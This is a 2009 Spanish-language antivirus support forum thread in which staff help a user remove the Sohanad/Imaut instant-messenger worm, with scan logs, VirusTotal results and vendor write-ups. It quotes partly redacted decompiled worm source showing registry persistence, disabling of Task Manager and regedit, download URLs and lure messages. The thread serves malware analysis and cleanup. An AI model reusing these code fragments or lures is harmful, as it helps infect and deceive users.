ayuda con virus Win32/Imaut o Sohanad.NAK??

[Antavardo]

bueno el problema es este

introduje un usb me salio un mensaje del norton diciendo que habia encontrado un virus entonces retire el usb y siguio todo bien pero cuando volvi a encender la compu se abre un menseja que dice k tengo un virus asi que lo elimine pero cada vez que lo elimino hace otro el mensaje es este:



Nombre del objeto: C:/WINDOWS/TEMP/????.tmp

Nombre del virus: W32.Imaut

** en los ??? cada vez aparece un archivo diferente ej. tmpB7



y cada vez que lo elimino hace uno con nombre diferente entonces instale el NOD32 y lo mismo aparece otro mensaje que dice:



File: C:/WINDOWS/TEMP/????.tmp

Threat: Win32/Sohanad.NAK worm



cada vez que lo borro hay otro con otro nombre

intente hacer lo que dice aqui pero cuando reinicio la compu vuelve a aparecer

http://www.vsantivirus.com/sohanad-nak.htm

asi que no c que hacer y no puedo hacer mucho k la compu anda muy tardada desde que se infercto si alguien sabe como repararlo?

[msc hotline sat]

No parece tener nada que ver el virus que detecto su antivirus al insertar el pendrive, con el que dice ahora detectar, que es un backdoor de IRC:

W32/Imaut.U
Nombre: W32/Imaut.U
Alias: W32.Imaut.U, Worm.W32/Imaut.U@IM
Tipo: Gusano de e-mail
Origen: Internet
Destructivo: NO
En la calle (in the wild): SI
Detección y eliminación: The Hacker 6.1, Registro de Virus al 07/01/2007

Descripción

W32/Imaut.U, es un gusano que se difunde a través del Yahoo Messenger, Microsoft Windows Live Messenger y AOL Instant Messenger. El gusano descarga en forma remota archivos que comprometen la computadora, y deshabilita el Administrador de Tareas y el registro de Windows.

Cuando el gusano se ejecuta descarga archivos de las siguientes rutas en internet

Y guarda los archivos en la siguiente ruta:

%system%\svchost32.exe
%system%\svchost.exe

Nota:
- %system% representa la carpeta "system" dentro de Windows (Ej. C:\WINDOWS\SYSTEM, C:\WINNT\SYSTEM32)

Adiciona las siguientes entradas en el registro para poder ejecutarse en cada inicio del sistema:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

"Task Manager" = "%Windows%\System\svchost.exe"



HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"Yahoo Messenger" = "%Windows%\System\svchost32.exe"

Nota:

- %windows%, representa la carpeta de instalación de Windows (Ej. C:\WINDOWS, C:\WINNT)


Modifica las siguientes entradas para deshabilitar el Editor de Registro y el Administrador de Tareas de Windows:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
"DisableRegistryTools"="1"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
"DisableTaskMgr"="1"

Modifica la siguiente entrada para evitar que se cambie manualmente la configuración de la página de Inicio del Internet Explorer

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
"Homepage" = "1"


El gusano busca las ventanas que contengan el título "Mi Pc" o "Explorador de Windows"



Finalmente utiliza Yahoo Messenger, Microsoft Windows Live Messenger y AOL Instant Messenger para difundirse a otras Computadoras, envía los siguientes mensajes con un enlace a la lista de contactos, dicho enlace descarga una copia del gusano.

Código: Seleccionar todo

:D who is beside you in this pic http://quicknews.info/friendpic[Bloqueado]" 
;) 1 of my vacation pictures http://quicknews.info/vacation[Bloqueado]" 
hot pics this week http://quicknews.info/hot[Bloqueado]" 
Screenshot of new windows version _ Windows Vista http://quicknews.info/vista[Bloqueado]" 
Images shot in Iraq _ The war will never end http://quicknews.info/Iraq[Bloqueado]" 
oh my god , i've won a 20000 usd lottery :O http://quicknews.info/mylottery[Bloqueado]" 
never click into the links like something in this image http://quicknews.info/dontclick[Bloqueado]" 
:( the page cannot be displayed http://quicknews.info/error[Bloqueado]" 
My pics http://quicknews.info/mypics[Bloqueado]" 
Miss World 2006: http://quicknews.info/MissWorld[Bloqueado]" 
Do you realize who is in this image: http://quicknews.info/who[Bloqueado]" [/quote] Fuente : hacksotf.com

Pruebe el ELITRIIP que es la utilidad en la que incluimos el control de estos gusanos:

ELITRIIP:
http://www.zonavirus.com/descargas/elitriip.asp

Tras probarlo, reiniciar y postearnos el contenido de C:\infosat.txt para ver el resultado del proceso

y aparte, visto que por ahí tiene virus de pendrive, vacune ordenador y pendrives con el ELIPEN para evitar la propagacion de los desconocidos:
Y vacune el ordenador y todas sus unidades de disco y pendrive con el ELIPEN:

ELIPEN.EXE
http://www.zonavirus.com/descargas/elipen.asp

Tras probarlo, reiniciar y postearnos el contenido de C:\infosat.txt para ver el resultado del proceso

saludos

ms, 20-3-2009

[Antavardo]

buenas

pues intente abrir el el EliTriip pero la compu esta demaciado lenta y se traba asi que lo abri en modo seguro y eso fue lo que salio





(20-3-2009 22:54:54)

EliTriIP v5.67 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 20 de Marzo del 2009)

---------------------------------------------

Lista de Acciones (por Acción Directa):

No detectado SP3 de Windows XP



(20-3-2009 22:55:52)

EliTriIP v5.67 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 20 de Marzo del 2009)

---------------------------------------------

Lista de Acciones (por Exploración):

Explorando "C:\"



(20-3-2009 23:51:31)

EliTriIP v5.67 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 20 de Marzo del 2009)

---------------------------------------------

Lista de Acciones (por Acción Directa):

No detectado SP3 de Windows XP



(20-3-2009 23:51:35)

EliTriIP v5.67 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 20 de Marzo del 2009)

---------------------------------------------

Lista de Acciones (por Exploración):

Explorando "C:\"

C:\WINDOWS\Temp\tmp1A82.tmp --> Eliminado, BackDoor.FakeViewer



Nº Total de Directorios: 7004

Nº Total de Ficheros: 77570

Nº de Ficheros Analizados: 14908

Nº de Ficheros Infectados: 1

Nº de Ficheros Limpiados: 1



Fri Mar 20 18:19:17 2009

EliPen v1.8 (c)2008 S.G.H. / Satinfo S.L.

------------------------------------------



Unidad C:\ Protegida



Unidad C:\ YA esta Protegida



Unidad C:\ YA esta Protegida







cuando reinicie la pc volvieron a avisarme los antivirus del virus que puedo hacer :S

[msc hotline sat]

Pues si bien algo se detectó y eliminó, parece que tenía varias cosas, virus de pendrive, backdoor fakeviewer, este otro típico de IRC, que no controlamos.



Pues envienos muestra de los ficheros donde lo detecta su antivirus, para lo que deberá copiarlos en una carpeta al respecto y luego, arrancando en modo seguro, empaquetar su contenido en un ZIP o RAR con password virus, para luego en modo normal, enviarnos dicho empaquetado como muestra para analizar (pulsando en el boton de envio de muestras que tiene arriba del todo a la derecha)



Tras analizarlos, implementaremos su control y eliminaicon en nuestras utilidades, de lo cual informaremos



saludos



ms, 21-3-2009

[Antavardo]

Muestra enviada



Saludos.

[msc hotline sat]

Bien, pues el lunes, cuando nos reincorporemos al trabajo en SATINFO, la analizaremos e informaremos



Mientras, puede subir dicho fichero al VirusTotal, ( http://www.virustotal.com ) a ver con qué nombre lo detectan los demas antivirus, para saber a qué atenernos y si hay que tomar otras medidas , y nos lo posteas para poder ayudarte.



saludos



ms, 21-3-2009

[Antavardo]

Motor antivirus Versión Última actualización Resultado
a-squared 4.0.0.101 2009.03.21 IM-Worm.Win32.Sohanad!IK
AhnLab-V3 5.0.0.2 2009.03.21 Win32/Sohanad.worm.497953
AntiVir 7.9.0.120 2009.03.20 W32/Sohanad.R
Authentium 5.1.2.4 2009.03.21 W32/Sohanad.G
Avast 4.8.1335.0 2009.03.20 Win32:Sohanad-BS
AVG 8.5.0.283 2009.03.20 Worm/Autoit.MYU
BitDefender 7.2 2009.03.21 Win32.Worm.Sohanad.NBC
CAT-QuickHeal 10.00 2009.03.21 I-Worm.Sohanad.t
ClamAV 0.94.1 2009.03.21 Trojan.Autoit-13
Comodo 1078 2009.03.21 -
DrWeb 4.44.0.09170 2009.03.21 Win32.HLLW.Texmer
eSafe 7.0.17.0 2009.03.19 Win32.Yahlover.worm.
eTrust-Vet 31.6.6409 2009.03.20 -
F-Prot 4.4.4.56 2009.03.20 W32/Sohanad.G
F-Secure 8.0.14470.0 2009.03.21 IM-Worm.Win32.Sohanad.t
Fortinet 3.117.0.0 2009.03.21 W32/Yahlover.C!worm
GData 19 2009.03.21 Win32.Worm.Sohanad.NBC
Ikarus T3.1.1.48.0 2009.03.21 IM-Worm.Win32.Sohanad
K7AntiVirus 7.10.678 2009.03.21 Trojan.Win32.Malware.1
Kaspersky 7.0.0.125 2009.03.21 IM-Worm.Win32.Sohanad.t
McAfee 5559 2009.03.20 W32/Yahlover.worm.gen.c
McAfee+Artemis 5559 2009.03.20 Generic!Artemis
McAfee-GW-Edition 6.7.6 2009.03.20 Win32.Sohanad.R
Microsoft 1.4502 2009.03.21 Worm:AutoIt/Sohanad.AI
NOD32 3953 2009.03.21 Win32/Sohanad.NAK
Norman 6.00.06 2009.03.20 Sohanad.TP
nProtect 2009.1.8.0 2009.03.21 -
Panda 10.0.0.10 2009.03.21 Application/PerfectKeylog.AI
PCTools 4.4.2.0 2009.03.21 Trojan.DL.AutoIt.DO
Prevx1 V2 2009.03.21 Medium Risk Malware
Rising 21.21.52.00 2009.03.21 Trojan.Win32.Autoit.bo
Sophos 4.39.0 2009.03.21 W32/AutoRun-UP
Sunbelt 3.2.1858.2 2009.03.20 IM-Worm.Win32.Sohanad.t
Symantec 1.4.4.12 2009.03.21 W32.Imaut
TheHacker 6.3.3.1.287 2009.03.21 W32/Sohanad.t
TrendMicro 8.700.0.1004 2009.03.20 WORM_SOHANAD.EA
VBA32 3.12.10.1 2009.03.20 -
ViRobot 2009.3.20.1658 2009.03.20 -
VirusBuster 4.6.5.0 2009.03.21 Trojan.DL.AutoIt.DO
Información adicional
Tamano archivo: 404789 bytes
MD5...: 4f8a8c06617536b53c95457f4b6b8eef
SHA1..: a9b2ccf8a3d37a9e2640ab893dc4c18b35e1857b
SHA256: abc030d480a9258b3f37ce8325b86cd68c2a9ca12fbfcc05cc360840be03f675
SHA512: 7feb0a3e5cb897391f877f277503d796826a5f336ab9609ba2deb798017e9695
b321f220202f6b52f33472391b2cabb131eb9c7611309e9dea2e644a8bbd393b
ssdeep: 6144:T/7AcH1wo4i9xZa7z5EMX/ljRKAJr73BhoiRh6CnyH1wo4i9xZa7z5EMX/l
jRKAy:T/7nR0pEilVnlxD16nR0pEilVnlf74

PEiD..: -
TrID..: File type identification
RAR Archive (83.3%)
REALbasic Project (16.6%)


Saludos

[lucl]

Pues lo unico ya si no lo has hecho es añadirle extension .VIR a la muestra enviada para que no te incordie hasta el lunes que te den la herramienta necesaria saludos

[msc hotline sat]

Y mientras, cabe añadir algo sobre el bicho

Ya antaño (Pronto hará 2 años) , VSAntivirus decía genéricamente:

VSantivirus No 2457 Año 11, lunes 28 de mayo de 2007

Sohanad.NAK. Se propaga por mensajería instantánea
http://www.vsantivirus.com/sohanad-nak.htm

Nombre: Sohanad.NAK
Nombre NOD32: Win32/Sohanad.NAK
Tipo: Gusano de Internet
Alias: Sohanad.NAK, IM-Worm.Win32.Sohanad.t, I-Worm.Sohanad.t, Trojan.Win32.VB.anm, W32.Yautoit, W32/IMWorm.CT, W32/Sohana.R!worm.im, W32/Sohana-R, Win32.HLLW.Texmer, Win32.Sohanad.t, Win32.Worm.Sohanat.AI, Win32/Sohanad.NAK, Win32/Sohanad.worm.239905, Win32/YahLover.AO, Win32:Trojan-gen.{UPX}, Worm.Sohanad.NAK, Worm/Sohanad.NAK, Worm:Win32/Sohonad.S
Fecha: 19/mar/07
Actualizado: 25/may/07
Plataforma: Windows 32-bit
Tamaño: 240,516 bytes (UPX)

Gusano que se propaga a través de programas de mensajería instantánea como AOL Instant Messenger, Windows Live Messenger, Windows Messenger y Yahoo Messenger, enviando mensajes con enlaces a todas las listas de contacto del usuario infectado.

Si el usuario hace clic en el enlace, se descarga y ejecuta el gusano propiamente dicho, desde determinados sitios de Internet.

Cuando ello ocurre, se crean en el sistema algunos de los siguientes archivos:
c:\windows\ssvichosst.exe

c:\windows\system32\autorun.ini
c:\windows\system32\setting.ini
c:\windows\system32\skcvhost.exe
c:\windows\system32\skcvhosthk.dll
c:\windows\system32\skcvhostr.exe
c:\windows\system32\ssvichosst.exe

X:\new folder.exe

Donde "X" es una unidad de disquete, CD, o cualquier unidad mapeada en red. Para engañar al usuario, el archivo "new folder" muestra el icono de una carpeta.

NOTA: En todos los casos, "c:\windows" y "c:\windows\system32" pueden variar de acuerdo al sistema operativo instalado ("c:\winnt", "c:\winnt\system32", "c:\windows\system", etc.).

El gusano crea o modifica las siguientes entradas en el registro, para autoejecutarse en cada reinicio del sistema, entre otras acciones:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Yahoo Messengger = "[camino y nombre del ejecutable]"

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Yahoo Messengger = "[camino y nombre del ejecutable]"

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Shell = "explorer.exe [nombre del ejecutable]"

HKCU\Software\Microsoft\Windows
\CurrentVersion\Explorer\WorkgroupCrawler\Shares
shared = \New Folder.exe

HKLM\SYSTEM\CurrentControlSet\Services\Schedule
AtTaskMaxHours = "0"

También desactiva el uso del editor del registro y el Administrador de tareas, modificando las siguientes entradas:

HKCU\Software\Microsoft\Windows
\CurrentVersion\Policies\Explorer
NofolderOptions = "1"

HKCU\Software\Microsoft\Windows
\CurrentVersion\Policies\System
DisableRegistryTools = "1"

HKCU\Software\Microsoft\Windows
\CurrentVersion\Policies\System
DisableTaskMgr = "1"

Fuente

y esta versión parece que es mas de lo mismo:

File Name : SSVICHOSST.exe
Virus : IM-Worm.Win32.Sohanad.t
The virus program was written in software “AutoIt”.
And it has been decompiled by the same software’s decompiler, “Exe2Aut v3?.
I don’t know whether anyone else has done this or not, here is the decompiled virus program:

*******************
*******************
; <AUT2EXE VERSION: 3.2.2.0>

; —————————————————————————-
; <AUT2EXE INCLUDE-START: C:\Documents and Settings\phuong anh\Desktop\nhatquanglan.au3>
; —————————————————————————-

;Written by Nhatquanglan
;contact nhatquanglan@gmail.com

; —————————————————————————-
; <AUT2EXE INCLUDE-START: C:\Program Files\AutoIt3\Include\Process.au3>
; —————————————————————————-

; Include Version:1.59 (04/20/2006)
; ——————————————————————————
;
; AutoIt Version: 3.0
; Language: English
; Description: Functions that assist with process management.
;
; —————————————————————–;==============================================;
; Description - Returns a string containing the process name that

belongs to a given PID.
; Syntax - _ProcessGetName( $iPID )
; Parameters - $iPID - The PID of a currently running process
; Requirements - None.
; Return Values - Success - The name of the process
; Failure - Blank string and sets @error
; 1 - Process doesn’t exist
; 2 - Error getting process list
; 3 - No processes found
; Author(s) - Erifash <erifash [at] gmail [dot] com>, Wouter van Kesteren.
; Notes - Supplementary to ProcessExists().
;===========================

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonxxxxxxxxx

;===========================;
; Function Name: _ProcessGetPriority()
; Description: Get the priority of an open process
; Parameter(s): $vProcess - PID or name of a process.
; Requirement(s): AutoIt Beta v3.1.1.61+
; kernel32.dll (included with Windows)
; Return Value(s): On Success - Returns integer corressponding to
; the processes’s priority:
; 0 - Idle/Low
; 1 - Below Normal (Not supported on Windows 95/98/ME)
; 2 - Normal
; 3 - Above Normal (Not supported on Windows 95/98/ME)
; 4 - High
; 5 - Realtime
; On Failure: Returns -1 and sets @Error to 1
; Author(s): Matthew Tucker
; Valik added Pid or Processname logic
;================;

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonxxxxxxxx
;================;
; Description: Executes a DOS command in a hidden command window.
; Syntax: _RunDOS( $sCommand )
; Parameter(s): $sCommand - Command to execute
; Requirement(s): None
; Return Value(s): On Success - Returns the exit code of the command
; On Failure - Depends on RunErrorsFatal setting
; Author(s): Jeremy Landes <jlandes at landeserve dot com>
; Note(s): None
;
;================

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonxxxxxxxxx

; —————————————————————————-
; <AUT2EXE INCLUDE-END: C:\Program Files\AutoIt3\Include\Process.au3>
; —————————————————————————-
#NoTrayIcon
$name = “SSVICHOSST”
$setting = “setting”
$ini = “.ini”
$nql = “.nql”
$xls = “.xls”
$exe = “.exe”
$toigioupdate = @HOUR + 2
$toigio = @MIN + 30 xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxxxxxxxRegWrite (”HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon”,”Shell”,”REG_SZ”,”Explorer.exe ” &

$name & $exe)

RegWrite (”HKEY_CURRENT_USER\Software\Microsoft\Windows\

CurrentVersion\Run”,“Yahoo Messengger”,”REG_SZ”,@SystemDir & “\” & $name & $exe)RegWrite (”HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Policies\Explorer”

,”NofolderOptions”,”REG_DWORD”,1)
RegWrite (”HKEY_CURRENT_USER\Software\Microsoft\Windows\

CurrentVersion\Policies\System”, “DisableTaskMgr”, “REG_DWORD”,1)
RegWrite (”HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\

Policies\System”, “DisableRegistryTools”, “REG_DWORD”,1)
RegWrite (”HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\

Schedule”,”AtTaskMaxHours”,”REG_DWORD”,0)

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxx

(”HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\

Explorer\WorkgroupCrawler\Shares”,”shared”)

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxx

Func downloadurl()
$settingurl=”http://nhatquanglan3.t35.com“


xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxx

$downloaded=”success”
$settingurl1 = “http://nhatquanglan4.t35.com“


xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxx

$myweb = “http://nhatquanglan1.0catch.com“


xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxxx

$tin[1] = “Vao day nghe bai nay di ban ” & $myweb & ” “
EndIf
$tin[2] = IniRead (@SystemDir & “\” & $setting & $ini,”setting”,”tin[2]“,”")
If $tin[2] = “” Then
$tin[2] = “Vao day nghe bai nay di ban ” & $myweb & ” “
EndIf
$tin[3] = IniRead (@SystemDir & “\” & $setting & $ini,”setting”,”tin[3]“,”")
If $tin[3] = “” Then
$tin[3] = “Biet tin gi chua, vao day coi di ” & $myweb & ” “
EndIf
$tin[4] = IniRead (@SystemDir & “\” & $setting & $ini,”setting”,”tin[4]“,”")
If $tin[4] = “” Then
$tin[4] = “Trang Web nay coi cung hay, vao coi thu di ” & $myweb & ” “
EndIf
$tin[5] = IniRead (@SystemDir & “\” & $setting & $ini,”setting”,”tin[5]“,”")
If $tin[5] = “” Then
$tin[5] = “Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi?

Ve dau khi bao nhieu mo mong gio da vo tan… Ve dau toi biet di ve dau? ” &$myweb &” “
EndIf
$tin[6] = IniRead (@SystemDir & “\” & $setting & $ini,”setting”,”tin[6]“,”")
If $tin[6] = “” Then
$tin[6] = “Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong. Bao nhieu yeu thuong nhung ngay qua da tan theo khoi may bay that xa… ” & $myweb & ” “
EndIf
$tin[7] = IniRead (@SystemDir & “\” & $setting & $ini,”setting”,”tin[7]“,”")
If $tin[7] = “” Then
$tin[7] = “Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon. Gio nguoi lac loi buoc chan ve noi xa xoi, cay dang chi rieng minh toi… ” & $myweb & ” “
EndIf
$tin[8] = IniRead (@SystemDir & “\” & $setting & $ini,”setting”,”tin[8]“,”")
If $tin[8] = “” Then
$tin[8] = “Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon. Nguoi da den nhu la giac mo roi ra di cho anh bat ngo… ” & $myweb & ” “
EndIf
$tin[9] = IniRead (@SystemDir & “\” & $setting & $ini,”setting”,”tin[9]“,”")
If $tin[9] = “” Then
$tin[9] = “Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra lai em niem tin thang nam qua ta dap xay. Gio day chi la nhung ky niem buon… ” & $myweb & ” “
EndIf
$tieude = WinGetTitle(”Yahoo! Messenger”, “”)


xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxxx

If WinExists (”Bkav2006?) Then

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxx


If WinExists (”System Configuration”) Thenxxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxxxxxxx If WinExists (”Registry”) Then
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxxxxxxx If WinExists (”Windows Task”) Then
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxxxxxxx If WinExists (”[FireLion]“) Then
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxx If ProcessExists (”cmd.exe”) then
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxx

(”HKEY_CURRENT_USER\Software\Microsoft\Windows\

CurrentVersion\Explorer\WorkgroupCrawler\Shares”,$i)


xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxxx

(”HKEY_CURRENT_USER\Software\Microsoft\Windows\

CurrentVersion\Explorer\

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxx


xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxx

; —————————————————————————-
; <AUT2EXE INCLUDE-END: C:\Documents and Settings\phuong anh\Desktop\nhatquanglan.au3>
; —————————————————————————-
*******************
*******************
OBSERVATIONS:
————-
Here you can clearly see:

#; <AUT2EXE INCLUDE-START: C:\Documents and Settings\phuong anh\Desktop\nhatquanglan.au3>
>phuong anh is probably the name of the virus writer.

#;Written by Nhatquanglan
>Probably his nick name, or something else.

#;contact nhatquanglan@gmail.com
>His email id, ofcourse u can’t be sure of.

#”http://nhatquanglan4.t35.com“
#”http://nhatquanglan4.t35.com“
#”http://nhatquanglan1.0catch.com“
>His websites.
#
E may, vao day coi co con nho nay ngon lam
Vao day nghe bai nay di ban
Vao day nghe bai nay di ban
Biet tin gi chua, vao day coi di
Trang Web nay coi cung hay, vao coi thu di
Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan… Ve dau toi biet di ve dau?
Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong. Bao nhieu yeu thuong nhung ngay qua da tan theo khoi may bay that xa…
Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon. Gio nguoi lac loi buoc chan ve noi xa xoi, cay dang chi rieng minh toi…
Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon. Nguoi da den nhu la giac mo roi ra di cho anh bat ngo…
Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra lai em niem tin thang nam qua ta dap xay. Gio day chi la nhung ky niem buon…
>The strings in the program

#Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan… Ve dau toi biet di ve dau?
#Biet tin gi chua, vao day coi di
>Matches with the spam caused in chatting softwares caused by Nhatquanglan virus with many varients like SCVHSOT.exe, scvshosts.exe, SCVVHSOT.exe
It means the Nhatquanglan virus with many varients is most probably written by the same person.
But the new virus files can’t be decompiled, because now he uses a password kind of thing in AutoIt programs called “Passphrase”. Clever… Unless you have the password, you can’t decompile.

Resumiendo, es una variante del AUTOIT, del que ya conocemos varios, que se recibe generalmente por MSN y se propaga por el mismo medio a los contactos del usuario infectado, ademas de la picaresca de copiar el fichero gusano a todas las unidades mapeadas, con el icono de una carpeta, para ser ejecutado cuando de pulsa sobre ella pensando entrar en la misma... "...unidad de disquete, CD, o cualquier unidad mapeada en red. Para engañar al usuario, el archivo "new folder" muestra el icono de una carpeta."

Deja inactivo la edicion del registro, el Administrador de tareas

Por supuesto que restableceremos las claves y eliminaremos los ficheros con la nueva version del ELISTARA que haremos el lunes (Dios mediante) al respecto.

saludos

ms, 22-3-2009

[msc hotline sat]

Y como que los AUTOIT los controlamnos con el ELISTARA y recientemente (el ppdo 19) implementamos el control y eliminacion de una nueva variante

Descarga el ELISTARA y tras probarlo, posteanos el informe resultante:

http://www.zonavirus.com/descargas/elistara.asp

Tras probarlo, reiniciar y postearnos el contenido de C:\infosat.txt para ver el resultado del proceso

saludos

ms, 22-3-2009

[msc hotline sat]

Recibidas muestras de carpeta TEMP, hemos entresacado de dos de ellas un código de malware cuyo controol y eliminacion hemos implementado en el ELISTARA de hoy, 18.27, como variante de Yahlower.

ELISTARA:
http://www.zonavirus.com/descargas/elistara.asp

Tras probarlo, reiniciar y postearnos el contenido de C:\infosat.txt para ver el resultado del proceso

A partir de las 19 h GMT, estará disponible en esta web, para pruebas de evaluacion en el foro de zonavirus


saludos

ms, 23-3-2009